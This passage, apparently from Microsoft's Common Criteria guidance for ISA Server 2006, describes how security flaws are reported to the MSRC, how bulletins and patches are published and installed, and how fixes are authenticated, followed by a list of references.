• Description of how someone might mount an attack via the flaw
• Additional information that might be helpful in investigating the issue
Data submitted via this page is encrypted using the Secure Sockets Layer protocol. The MSRC's PGP key is available at http://www.microsoft.com/technet/security/MSRC.asc

7.2 How to get informed about Security Flaws and Flaw Remediation

A security update issued by the MSRC is always accompanied by a bulletin. The bulletin contains the information that Microsoft makes available to customers so that they can decide whether to install the fix and on which systems. Every bulletin comes with a rating to reflect its criticality (four levels). A KB article is also provided, but it is mostly a pointer to the bulletin. The public page with Microsoft bulletins is located at http://www.microsoft.com/security/bulletins/default.mspx

7.3 Installing a remedy

The security bulletins contain the affected product versions, links to download the security patch, and guidance for manual (as well as automated) installation of the patch.

Figure 7.1 – Installation Instructions for Security Bulletin (example)

7.4 Authentication of a Fix

For a product released via the Web, digital signatures are used to identify the source download as coming from Microsoft.

8 References and Glossary

This section provides references and a glossary.

8.1 References

General Common Criteria Documents
[CC] Common Criteria for Information Technology Security Evaluation, version 2.3, revision August 2005. Part 1: Introduction and general model, CCMB-2005-08-001; Part 2: Security functional requirements, CCMB-2005-08-002; Part 3: Security assurance requirements, CCMB-2005-08-003.

ISA Server 2006 Administrator Guidance and Publicly Available Evaluation Developer Documents
[MSISA] Microsoft Internet Security and Acceleration Server 2006 Help, Microsoft Corp., Version 2006 Standard Edition / Enterprise Edition. This help file is installed during ISA Server 2006 setup (isa.chm, stored on CD-ROM).
[MSISAHARD] Security Hardening Guide – Microsoft Internet Security and Acceleration Server 2004, Microsoft Corp., Version 2006, downloadable from http://go.microsoft.com/fwlink/?LinkID=24507
[ST] ISA Server 2006 SE/EE Common Criteria Evaluation – Security Target, Version 1.1, 2007-06-05, Microsoft Corp.
[WINST] Microsoft Windows Server 2003 or Windows XP Security Target, Version 1.0, 28.09.2005, Microsoft Corporation.
[WINVR] National Information Assurance Partnership, Common Criteria Evaluation and Validation Scheme, Validation Report: Microsoft Windows Server 2003 and Windows XP Workstation, Report Number CCEVS-VR-05-0131, November 6, 2005, Version 1.1.

8.2 Acronyms
8.3 Glossary